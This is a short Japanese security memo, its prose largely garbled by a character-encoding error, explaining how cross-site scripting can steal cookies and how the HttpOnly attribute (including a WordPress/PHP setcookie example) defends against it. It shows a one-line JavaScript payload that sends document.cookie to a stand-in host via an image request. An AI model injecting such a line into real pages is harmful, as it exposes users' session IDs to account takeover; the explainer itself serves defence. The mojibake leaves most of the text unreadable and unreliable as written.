Cookieを盗む例ã¨httponly属性 at softelメモ以下ã¯ã€ã¨ã¦ã‚‚å˜ç´”ãªJavascriptã«ã‚ˆã‚‹ä¾‹ã€‚ document.write('<img src="http://example.com/?x=' +escape(document.cookie) + '">'); example.com ã«å¯¾ã—ã¦GET渡ã—ã§document.cookieãŒé€ä¿¡ã•ã‚Œã‚‹ã€‚ å–å¾—ã•ã‚ŒãŸcookieã«ã‚»ãƒƒã‚·ãƒ§ãƒ³IDãŒå«ã¾ã‚Œã‚‹ã¨ã‚»ãƒƒã‚·ãƒ§ãƒ³IDãŒä»–人ã«çŸ¥ã‚‰ã‚Œã‚‹ã¨ã“ã‚ã¨ãªã‚‹ã€‚ リンクをè¸ã¾ã›ã‚‹ãªã©ã®æ–¹æ³•ã§HTMLä¸ã«ä¸Šã®ã‚ˆã†ãªã‚¹ã‚¯ãƒªãƒ—トを仕込むã“ã¨ãŒã§ãã‚‹ã¨ã€æ”»æ’ƒãŒæˆç«‹ã™ã‚‹ã€‚ 対ç–例 document.cookieã§å–å¾—ã§ãã¦ã—ã¾ã†ã‹ã‚‰å±é™ºãªã®ã§ã¯ï¼Ÿ → 発行ã™ã‚‹cookieã«httponly属性を付与ã—ã¦ã€document.cookieã§å–å¾—ã§ããªãã—よㆠWordPressã§ã‚‚以下ã®ã‚ˆã†ãªæ›¸ã方をã—ã¦ã„ãŸã€‚PHP5.2.0ã§è¿½åŠ ã•ã‚ŒãŸç¬¬7引数ã§httponly
Cookieã®Secure属性ã¨HttpOnly属性
httpOnlyãªCookieã¨ã¯ï¼Ÿ - ãれマグã§ï¼
Bindit
{{#tags}}- {{label}}
{{/tags}}